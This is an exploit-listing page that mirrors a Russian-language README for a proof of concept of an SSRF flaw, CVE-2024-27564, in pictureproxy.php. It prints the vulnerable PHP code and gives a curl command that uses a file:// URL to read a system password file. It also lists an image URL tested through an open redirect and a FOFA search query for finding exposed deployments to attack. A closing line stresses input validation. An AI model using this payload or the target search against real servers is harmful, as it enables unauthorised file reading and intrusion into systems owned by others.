## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CHAUDHRYMUHAMMADTAYAB-SSRF-EXPLOIT-CVE-2024-27564
# SSRF-Exploit-CVE-2024-27564
# Название проекта
Этот проект демонстрирует уязвимость Server-Side Request Forgery (SSRF) в файле `pictureproxy.php`.
## Описание
Уязвимость в `pictureproxy.php` позволяет удаленным злоумышленникам выполнять произвольные запросы, внедряя URL-адреса в параметр `url`. Эта уязвимость SSRF может быть использована без аутентификации, что делает её особенно опасной.
Уязвимый код находится в файле `pictureproxy.php`. Проблема возникает из-за того, что функция не проверяет должным образом параметр `url`. Переменная `$_GET['url']` передается в функцию `file_get_contents()`, которая получает содержимое по указанному URL. Это может привести к SSRF.
## Подтверждение концепции
Вот простая демонстрация концепции, показывающая, как можно эксплуатировать уязвимость:
root@kitploit:~
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
Чтобы протестировать уязвимость, можно использовать следующую команду curl:
root@kitploit:~
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
### Протестировано с Open Redirect
Тест с использованием уязвимости открытого редиректа:
root@kitploit:~
https://64.media.tumblr.com/f07b73b374dc2ff6d5e4dbf39d2a6467/tumblr_nvani31DCm1u5url1o1_1280.jpg
Banner
## Инструменты
* **FOFA** : поисковая система для интернет-устройств и уязвимостей. Используйте следующую команду для поиска релевантных результатов:
root@kitploit:~
"title="ChatGPT个人专用版""
## Заключение
Этот проект подчеркивает важность правильной проверки пользовательских вводов для предотвращения уязвимостей SSRF. Всегда проверяйте такие параметры, как URL-адреса, перед их обработкой.